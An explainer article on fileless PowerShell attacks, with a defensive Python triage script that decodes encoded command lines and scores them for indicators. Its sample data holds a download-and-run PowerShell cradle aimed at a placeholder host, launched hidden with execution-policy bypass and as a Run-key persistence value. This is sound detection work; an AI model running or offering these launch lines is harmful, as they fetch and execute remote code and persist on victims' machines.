What is a Fileless Attack?

By Nyotron Security Research Team

Leaving footprints on a victim’s machine is something most malware writers wish to avoid, for reasons such as alerting the victim to the malicious activity, making it harder for security researchers to analyze the attack, and bypassing AV software.

The most obvious footprint is placing an executable on the machine, but a growing number of published attacks show that malware writers are using fileless attacks, meaning that all of the malicious activity is performed in memory instead of writing the malicious executable to disk.

An example of such an attack is the abuse of PowerShell, a legitimate Microsoft framework, to carry out the malicious activity. PowerShell has nearly unlimited damage potential because of its capabilities, which range from downloading data from or uploading data to a remote server to encrypting the user’s files.

The drawback of a fileless attack is survivability. While making an executable run again after a reboot by placing it in one of various locations in the Registry or file system is easy enough, making a malicious piece of code that lives only in memory execute again after the system reboots is not trivial.
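Because a fileless PowerShell attack leaves no executable on disk, the command line that launched PowerShell (and, for the persistence problem described above, any Registry Run-key value that relaunches it after a reboot) is often the only artifact a defender gets. The script below is an added example, not code from the article or from Nyotron: it assumes command lines have already been collected from a source such as Sysmon Event ID 1 or Windows Security Event 4688, decodes any `-EncodedCommand` argument (base64 of UTF-16LE text), and scores each record against a small indicator list. The indicator names, weights and threshold are illustrative assumptions, and the three sample records are constructed for the example.

```python
"""Triage Windows command lines and Run-key values for fileless PowerShell indicators.

Added example, not from the original article. Assumes the records were already
collected from Sysmon Event ID 1 / Security Event 4688 or from Run keys; the
sample records below are constructed, and the weights are illustrative.
"""
import base64
import re

# Captures the base64 argument of -e / -ec / -en / -enc / -EncodedCommand
# (PowerShell accepts unambiguous abbreviations of its switches).
ENCODED_ARG = re.compile(r"\s-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)

# (indicator name, pattern, weight). Weights are assumptions for this example.
INDICATORS = [
    ("encoded_command", ENCODED_ARG, 3),
    ("hidden_window", re.compile(r"-w[a-z]*\s+hidden", re.I), 2),
    ("execution_policy_bypass", re.compile(r"-ex[a-z]*\s+bypass", re.I), 2),
    ("no_profile", re.compile(r"-nop[a-z]*", re.I), 1),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient", re.I), 3),
    ("invoke_expression", re.compile(r"Invoke-Expression|\biex\b", re.I), 3),
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/undecodable."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        # PowerShell encodes the script as UTF-16LE before base64-encoding it.
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_command_line(cmdline):
    """Score the raw command line plus its decoded payload; each indicator counts once."""
    decoded = decode_encoded_command(cmdline)
    haystack = cmdline if decoded is None else cmdline + " " + decoded
    hits = [name for name, pattern, _ in INDICATORS if pattern.search(haystack)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    return score, hits, decoded


def triage(records, threshold=5):
    """Return one finding per (source, text) record; 'suspicious' uses the assumed threshold."""
    findings = []
    for source, text in records:
        score, hits, decoded = score_command_line(text)
        findings.append({
            "source": source,
            "score": score,
            "hits": hits,
            "decoded": decoded,
            "suspicious": score >= threshold,
        })
    return findings


# Constructed sample data: a benign scheduled script, an in-memory download-and-run
# launch, and a Run-key value that would relaunch the same payload after reboot.
PAYLOAD = "(New-Object Net.WebClient).DownloadString('http://example.invalid/x') | IEX"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")
SAMPLE_RECORDS = [
    ("sysmon_1", "powershell.exe -NoProfile -ExecutionPolicy RemoteSigned -File C:\\scripts\\backup.ps1"),
    ("sysmon_1", "powershell.exe -NoP -W Hidden -Exec Bypass -Enc " + ENCODED),
    ("run_key", "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater = "
                "powershell.exe -w hidden -e " + ENCODED),
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        flag = "SUSPICIOUS" if finding["suspicious"] else "ok"
        print(f"[{flag}] {finding['source']} score={finding['score']} hits={finding['hits']}")
        if finding["decoded"]:
            print(f"    decoded: {finding['decoded']}")
```

Decoding the payload before matching is the important step: the raw command line of the second and third records contains none of the download or `IEX` strings, so a detector that inspects only the visible text would score them far lower. The Run-key record shows why the persistence point matters to defenders: a memory-only payload that wants to survive a reboot has to leave a launcher somewhere, and that launcher is where it becomes visible.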

Source: InfoSecurity Magazine